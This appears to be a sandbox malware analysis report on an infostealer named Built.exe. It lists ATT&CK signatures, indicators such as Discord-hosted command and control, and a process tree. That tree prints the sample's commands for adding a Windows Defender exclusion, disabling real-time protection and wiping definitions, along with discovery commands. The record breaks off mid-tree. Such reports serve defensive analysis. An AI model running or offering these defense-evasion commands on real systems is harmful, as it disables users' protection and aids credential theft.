2da43825dabc7fe762f5508df8190fcab3357e734aa67068663e6d664972854c

Analysis

max time kernel
94s
max time network
153s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
21-12-2024 19:27

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Built.exe
Size

6.3MB
MD5

167d60bc914e36f9ab8e72b3801a9735
SHA1

88395156150b725970f6b95905321b347f1b5207
SHA256

2da43825dabc7fe762f5508df8190fcab3357e734aa67068663e6d664972854c
SHA512

603fd7b3997743265b99ffddc1adaff785688b2f80af4b89ee2e2eb70d2e8d4c4b80832d50e4791f5f5aff8a33ba03b0a9c8b7d71fd14055a2e5841b717fb824
SSDEEP

98304:RjcaCctL2KTRYABCh+gD4JREOk7XQ5PXH0YXG3FfNmbT2z/wly1/ULGDKhOh112y:TNWANgXX7glXHPINm2UyaLGm4fP

Score

8^/10

collection credential_access defense_evasion discovery execution persistence privilege_escalation spyware stealer upx

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
4472	powershell.exe
924	powershell.exe
4868	powershell.exe
3756	powershell.exe
1428	powershell.exe

Drops file in Drivers directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Built.exe

ACProtect 1.3x - 1.4x DLL software 16 IoCs

Detects file using ACProtect software.

resource	yara_rule
behavioral2/files/0x000a000000023b93-21.dat	acprotect
behavioral2/files/0x000a000000023b86-27.dat	acprotect
behavioral2/files/0x000a000000023b91-29.dat	acprotect
behavioral2/files/0x000a000000023b8d-46.dat	acprotect
behavioral2/files/0x000a000000023b8c-45.dat	acprotect
behavioral2/files/0x000a000000023b8b-44.dat	acprotect
behavioral2/files/0x000a000000023b8a-43.dat	acprotect
behavioral2/files/0x000a000000023b89-42.dat	acprotect
behavioral2/files/0x000a000000023b88-41.dat	acprotect
behavioral2/files/0x000a000000023b87-40.dat	acprotect
behavioral2/files/0x000a000000023b85-39.dat	acprotect
behavioral2/files/0x000a000000023b98-38.dat	acprotect
behavioral2/files/0x000a000000023b97-37.dat	acprotect
behavioral2/files/0x000a000000023b96-36.dat	acprotect
behavioral2/files/0x000a000000023b92-33.dat	acprotect
behavioral2/files/0x000a000000023b90-32.dat	acprotect

Clipboard Data 1 TTPs 2 IoCs

Adversaries may collect data stored in the clipboard from users copying information within or between applications.

collection

Clipboard Data

T1115

pid	Process
4632	cmd.exe
2720	powershell.exe

Executes dropped EXE 1 IoCs

pid	Process
8	rar.exe

Loads dropped DLL 17 IoCs

pid	Process
2084	Built.exe
2084	Built.exe
2084	Built.exe
2084	Built.exe
2084	Built.exe
2084	Built.exe
2084	Built.exe
2084	Built.exe
2084	Built.exe
2084	Built.exe
2084	Built.exe
2084	Built.exe
2084	Built.exe
2084	Built.exe
2084	Built.exe
2084	Built.exe
2084	Built.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
23	discord.com
24	discord.com

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
21	ip-api.com
15	ip-api.com

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Enumerates processes with tasklist 1 TTPs 5 IoCs

discovery

Process Discovery

T1057

pid	Process
936	tasklist.exe
5024	tasklist.exe
1304	tasklist.exe
1924	tasklist.exe
3180	tasklist.exe

Hide Artifacts: Hidden Files and Directories 1 TTPs 1 IoCs

defense_evasion

Hidden Files and Directories

T1564.001

pid	Process
1200	cmd.exe

UPX packed file 63 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/files/0x000a000000023b93-21.dat	upx
behavioral2/memory/2084-25-0x0000000075000000-0x0000000075519000-memory.dmp	upx
behavioral2/files/0x000a000000023b86-27.dat	upx
behavioral2/files/0x000a000000023b91-29.dat	upx
behavioral2/memory/2084-48-0x0000000074FA0000-0x0000000074FAD000-memory.dmp	upx
behavioral2/memory/2084-47-0x0000000074FB0000-0x0000000074FCE000-memory.dmp	upx
behavioral2/files/0x000a000000023b8d-46.dat	upx
behavioral2/files/0x000a000000023b8c-45.dat	upx
behavioral2/files/0x000a000000023b8b-44.dat	upx
behavioral2/files/0x000a000000023b8a-43.dat	upx
behavioral2/files/0x000a000000023b89-42.dat	upx
behavioral2/files/0x000a000000023b88-41.dat	upx
behavioral2/files/0x000a000000023b87-40.dat	upx
behavioral2/files/0x000a000000023b85-39.dat	upx
behavioral2/files/0x000a000000023b98-38.dat	upx
behavioral2/files/0x000a000000023b97-37.dat	upx
behavioral2/files/0x000a000000023b96-36.dat	upx
behavioral2/files/0x000a000000023b92-33.dat	upx
behavioral2/files/0x000a000000023b90-32.dat	upx
behavioral2/memory/2084-56-0x0000000074F50000-0x0000000074F68000-memory.dmp	upx
behavioral2/memory/2084-58-0x0000000074F30000-0x0000000074F4B000-memory.dmp	upx
behavioral2/memory/2084-55-0x0000000074F70000-0x0000000074F97000-memory.dmp	upx
behavioral2/memory/2084-60-0x0000000074DF0000-0x0000000074F2E000-memory.dmp	upx
behavioral2/memory/2084-62-0x0000000074DD0000-0x0000000074DE6000-memory.dmp	upx
behavioral2/memory/2084-70-0x0000000074CA0000-0x0000000074D49000-memory.dmp	upx
behavioral2/memory/2084-69-0x0000000074D80000-0x0000000074D8C000-memory.dmp	upx
behavioral2/memory/2084-73-0x0000000074D50000-0x0000000074D7E000-memory.dmp	upx
behavioral2/memory/2084-72-0x0000000074900000-0x0000000074C93000-memory.dmp	upx
behavioral2/memory/2084-68-0x0000000075000000-0x0000000075519000-memory.dmp	upx
behavioral2/memory/2084-75-0x0000000074890000-0x00000000748A0000-memory.dmp	upx
behavioral2/memory/2084-78-0x0000000074880000-0x000000007488C000-memory.dmp	upx
behavioral2/memory/2084-77-0x0000000074FB0000-0x0000000074FCE000-memory.dmp	upx
behavioral2/memory/2084-80-0x0000000074750000-0x0000000074868000-memory.dmp	upx
behavioral2/memory/2084-108-0x0000000074F30000-0x0000000074F4B000-memory.dmp	upx
behavioral2/memory/2084-135-0x0000000074DF0000-0x0000000074F2E000-memory.dmp	upx
behavioral2/memory/2084-142-0x0000000074DD0000-0x0000000074DE6000-memory.dmp	upx
behavioral2/memory/2084-162-0x0000000074CA0000-0x0000000074D49000-memory.dmp	upx
behavioral2/memory/2084-164-0x0000000074900000-0x0000000074C93000-memory.dmp	upx
behavioral2/memory/2084-246-0x0000000074D50000-0x0000000074D7E000-memory.dmp	upx
behavioral2/memory/2084-268-0x0000000074890000-0x00000000748A0000-memory.dmp	upx
behavioral2/memory/2084-286-0x0000000074900000-0x0000000074C93000-memory.dmp	upx
behavioral2/memory/2084-289-0x0000000074750000-0x0000000074868000-memory.dmp	upx
behavioral2/memory/2084-285-0x0000000074CA0000-0x0000000074D49000-memory.dmp	upx
behavioral2/memory/2084-276-0x0000000074FB0000-0x0000000074FCE000-memory.dmp	upx
behavioral2/memory/2084-275-0x0000000075000000-0x0000000075519000-memory.dmp	upx
behavioral2/memory/2084-416-0x0000000074DF0000-0x0000000074F2E000-memory.dmp	upx
behavioral2/memory/2084-410-0x0000000075000000-0x0000000075519000-memory.dmp	upx
behavioral2/memory/2084-411-0x0000000074FB0000-0x0000000074FCE000-memory.dmp	upx
behavioral2/memory/2084-449-0x0000000074750000-0x0000000074868000-memory.dmp	upx
behavioral2/memory/2084-459-0x0000000074CA0000-0x0000000074D49000-memory.dmp	upx
behavioral2/memory/2084-458-0x0000000074D80000-0x0000000074D8C000-memory.dmp	upx
behavioral2/memory/2084-457-0x0000000074DD0000-0x0000000074DE6000-memory.dmp	upx
behavioral2/memory/2084-456-0x0000000074DF0000-0x0000000074F2E000-memory.dmp	upx
behavioral2/memory/2084-455-0x0000000074F30000-0x0000000074F4B000-memory.dmp	upx
behavioral2/memory/2084-454-0x0000000074D50000-0x0000000074D7E000-memory.dmp	upx
behavioral2/memory/2084-453-0x0000000074F70000-0x0000000074F97000-memory.dmp	upx
behavioral2/memory/2084-452-0x0000000074F50000-0x0000000074F68000-memory.dmp	upx
behavioral2/memory/2084-448-0x0000000074880000-0x000000007488C000-memory.dmp	upx
behavioral2/memory/2084-447-0x0000000074890000-0x00000000748A0000-memory.dmp	upx
behavioral2/memory/2084-460-0x0000000074900000-0x0000000074C93000-memory.dmp	upx
behavioral2/memory/2084-435-0x0000000075000000-0x0000000075519000-memory.dmp	upx
behavioral2/memory/2084-451-0x0000000074FB0000-0x0000000074FCE000-memory.dmp	upx
behavioral2/memory/2084-450-0x0000000074FA0000-0x0000000074FAD000-memory.dmp	upx

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe

System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WMIC.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tree.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WMIC.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WMIC.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tree.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	attrib.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tasklist.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	systeminfo.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tree.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Built.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WMIC.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	attrib.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tasklist.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WMIC.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tasklist.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Built.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WMIC.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WMIC.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tasklist.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tree.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	csc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cvtres.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tree.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	attrib.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tree.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WMIC.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
1892	cmd.exe
4340	PING.EXE

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
3184	netsh.exe
5056	cmd.exe

Detects videocard installed 1 TTPs 3 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
3216	WMIC.exe
2788	WMIC.exe
1808	WMIC.exe

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
720	systeminfo.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
4340	PING.EXE

Suspicious behavior: EnumeratesProcesses 20 IoCs

pid	Process
4472	powershell.exe
3756	powershell.exe
3756	powershell.exe
4472	powershell.exe
1428	powershell.exe
1428	powershell.exe
2720	powershell.exe
2720	powershell.exe
4816	powershell.exe
4816	powershell.exe
2720	powershell.exe
4816	powershell.exe
924	powershell.exe
924	powershell.exe
2576	powershell.exe
2576	powershell.exe
4868	powershell.exe
4868	powershell.exe
928	powershell.exe
928	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	5024	tasklist.exe
Token: SeDebugPrivilege	4472	powershell.exe
Token: SeDebugPrivilege	3756	powershell.exe
Token: SeIncreaseQuotaPrivilege	3744	WMIC.exe
Token: SeSecurityPrivilege	3744	WMIC.exe
Token: SeTakeOwnershipPrivilege	3744	WMIC.exe
Token: SeLoadDriverPrivilege	3744	WMIC.exe
Token: SeSystemProfilePrivilege	3744	WMIC.exe
Token: SeSystemtimePrivilege	3744	WMIC.exe
Token: SeProfSingleProcessPrivilege	3744	WMIC.exe
Token: SeIncBasePriorityPrivilege	3744	WMIC.exe
Token: SeCreatePagefilePrivilege	3744	WMIC.exe
Token: SeBackupPrivilege	3744	WMIC.exe
Token: SeRestorePrivilege	3744	WMIC.exe
Token: SeShutdownPrivilege	3744	WMIC.exe
Token: SeDebugPrivilege	3744	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3744	WMIC.exe
Token: SeRemoteShutdownPrivilege	3744	WMIC.exe
Token: SeUndockPrivilege	3744	WMIC.exe
Token: SeManageVolumePrivilege	3744	WMIC.exe
Token: 33	3744	WMIC.exe
Token: 34	3744	WMIC.exe
Token: 35	3744	WMIC.exe
Token: 36	3744	WMIC.exe
Token: SeIncreaseQuotaPrivilege	3744	WMIC.exe
Token: SeSecurityPrivilege	3744	WMIC.exe
Token: SeTakeOwnershipPrivilege	3744	WMIC.exe
Token: SeLoadDriverPrivilege	3744	WMIC.exe
Token: SeSystemProfilePrivilege	3744	WMIC.exe
Token: SeSystemtimePrivilege	3744	WMIC.exe
Token: SeProfSingleProcessPrivilege	3744	WMIC.exe
Token: SeIncBasePriorityPrivilege	3744	WMIC.exe
Token: SeCreatePagefilePrivilege	3744	WMIC.exe
Token: SeBackupPrivilege	3744	WMIC.exe
Token: SeRestorePrivilege	3744	WMIC.exe
Token: SeShutdownPrivilege	3744	WMIC.exe
Token: SeDebugPrivilege	3744	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3744	WMIC.exe
Token: SeRemoteShutdownPrivilege	3744	WMIC.exe
Token: SeUndockPrivilege	3744	WMIC.exe
Token: SeManageVolumePrivilege	3744	WMIC.exe
Token: 33	3744	WMIC.exe
Token: 34	3744	WMIC.exe
Token: 35	3744	WMIC.exe
Token: 36	3744	WMIC.exe
Token: SeIncreaseQuotaPrivilege	3216	WMIC.exe
Token: SeSecurityPrivilege	3216	WMIC.exe
Token: SeTakeOwnershipPrivilege	3216	WMIC.exe
Token: SeLoadDriverPrivilege	3216	WMIC.exe
Token: SeSystemProfilePrivilege	3216	WMIC.exe
Token: SeSystemtimePrivilege	3216	WMIC.exe
Token: SeProfSingleProcessPrivilege	3216	WMIC.exe
Token: SeIncBasePriorityPrivilege	3216	WMIC.exe
Token: SeCreatePagefilePrivilege	3216	WMIC.exe
Token: SeBackupPrivilege	3216	WMIC.exe
Token: SeRestorePrivilege	3216	WMIC.exe
Token: SeShutdownPrivilege	3216	WMIC.exe
Token: SeDebugPrivilege	3216	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3216	WMIC.exe
Token: SeRemoteShutdownPrivilege	3216	WMIC.exe
Token: SeUndockPrivilege	3216	WMIC.exe
Token: SeManageVolumePrivilege	3216	WMIC.exe
Token: 33	3216	WMIC.exe
Token: 34	3216	WMIC.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2480 wrote to memory of 2084	2480	Built.exe	83
PID 2480 wrote to memory of 2084	2480	Built.exe	83
PID 2480 wrote to memory of 2084	2480	Built.exe	83
PID 2084 wrote to memory of 2916	2084	Built.exe	84
PID 2084 wrote to memory of 2916	2084	Built.exe	84
PID 2084 wrote to memory of 2916	2084	Built.exe	84
PID 2084 wrote to memory of 4260	2084	Built.exe	85
PID 2084 wrote to memory of 4260	2084	Built.exe	85
PID 2084 wrote to memory of 4260	2084	Built.exe	85
PID 2084 wrote to memory of 3408	2084	Built.exe	86
PID 2084 wrote to memory of 3408	2084	Built.exe	86
PID 2084 wrote to memory of 3408	2084	Built.exe	86
PID 2084 wrote to memory of 4556	2084	Built.exe	88
PID 2084 wrote to memory of 4556	2084	Built.exe	88
PID 2084 wrote to memory of 4556	2084	Built.exe	88
PID 4260 wrote to memory of 4472	4260	cmd.exe	92
PID 4260 wrote to memory of 4472	4260	cmd.exe	92
PID 4260 wrote to memory of 4472	4260	cmd.exe	92
PID 4556 wrote to memory of 5024	4556	cmd.exe	93
PID 4556 wrote to memory of 5024	4556	cmd.exe	93
PID 4556 wrote to memory of 5024	4556	cmd.exe	93
PID 2916 wrote to memory of 3756	2916	cmd.exe	94
PID 2916 wrote to memory of 3756	2916	cmd.exe	94
PID 2916 wrote to memory of 3756	2916	cmd.exe	94
PID 3408 wrote to memory of 4772	3408	cmd.exe	95
PID 3408 wrote to memory of 4772	3408	cmd.exe	95
PID 3408 wrote to memory of 4772	3408	cmd.exe	95
PID 2084 wrote to memory of 4436	2084	Built.exe	96
PID 2084 wrote to memory of 4436	2084	Built.exe	96
PID 2084 wrote to memory of 4436	2084	Built.exe	96
PID 4436 wrote to memory of 3744	4436	cmd.exe	134
PID 4436 wrote to memory of 3744	4436	cmd.exe	134
PID 4436 wrote to memory of 3744	4436	cmd.exe	134
PID 2084 wrote to memory of 2324	2084	Built.exe	100
PID 2084 wrote to memory of 2324	2084	Built.exe	100
PID 2084 wrote to memory of 2324	2084	Built.exe	100
PID 2324 wrote to memory of 1048	2324	cmd.exe	102
PID 2324 wrote to memory of 1048	2324	cmd.exe	102
PID 2324 wrote to memory of 1048	2324	cmd.exe	102
PID 2084 wrote to memory of 3944	2084	Built.exe	103
PID 2084 wrote to memory of 3944	2084	Built.exe	103
PID 2084 wrote to memory of 3944	2084	Built.exe	103
PID 3944 wrote to memory of 4608	3944	cmd.exe	105
PID 3944 wrote to memory of 4608	3944	cmd.exe	105
PID 3944 wrote to memory of 4608	3944	cmd.exe	105
PID 2084 wrote to memory of 2288	2084	Built.exe	106
PID 2084 wrote to memory of 2288	2084	Built.exe	106
PID 2084 wrote to memory of 2288	2084	Built.exe	106
PID 2288 wrote to memory of 3216	2288	cmd.exe	108
PID 2288 wrote to memory of 3216	2288	cmd.exe	108
PID 2288 wrote to memory of 3216	2288	cmd.exe	108
PID 2084 wrote to memory of 904	2084	Built.exe	109
PID 2084 wrote to memory of 904	2084	Built.exe	109
PID 2084 wrote to memory of 904	2084	Built.exe	109
PID 904 wrote to memory of 2788	904	cmd.exe	111
PID 904 wrote to memory of 2788	904	cmd.exe	111
PID 904 wrote to memory of 2788	904	cmd.exe	111
PID 2084 wrote to memory of 1200	2084	Built.exe	112
PID 2084 wrote to memory of 1200	2084	Built.exe	112
PID 2084 wrote to memory of 1200	2084	Built.exe	112
PID 2084 wrote to memory of 2984	2084	Built.exe	113
PID 2084 wrote to memory of 2984	2084	Built.exe	113
PID 2084 wrote to memory of 2984	2084	Built.exe	113
PID 1200 wrote to memory of 4232	1200	cmd.exe	116

Views/modifies file attributes 1 TTPs 3 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
4232	attrib.exe
3900	attrib.exe
2640	attrib.exe

C:\Users\Admin\AppData\Local\Temp\Built.exe
"C:\Users\Admin\AppData\Local\Temp\Built.exe"
1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2480
- C:\Users\Admin\AppData\Local\Temp\Built.exe
  "C:\Users\Admin\AppData\Local\Temp\Built.exe"
  2⤵
  - Drops file in Drivers directory
  - Loads dropped DLL
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2084
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Built.exe'"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2916
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Built.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3756
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4260
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
      4⤵
      Command and Scripting Interpreter: PowerShell
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4472
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('', 0, '', 0+16);close()""
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3408
  - - C:\Windows\SysWOW64\mshta.exe
      mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('', 0, '', 0+16);close()"
      4⤵
      System Location Discovery: System Language Discovery
      PID:4772
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:4556
  - - C:\Windows\SysWOW64\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:5024
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:4436
  - - C:\Windows\SysWOW64\Wbem\WMIC.exe
      wmic csproduct get uuid
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of AdjustPrivilegeToken
      PID:3744
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2324
  - - C:\Windows\SysWOW64\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
      4⤵
      System Location Discovery: System Language Discovery
      PID:1048
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:3944
  - - C:\Windows\SysWOW64\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
      4⤵
      System Location Discovery: System Language Discovery
      PID:4608
- - C:\Windows\SysWOW64\cmd.exe
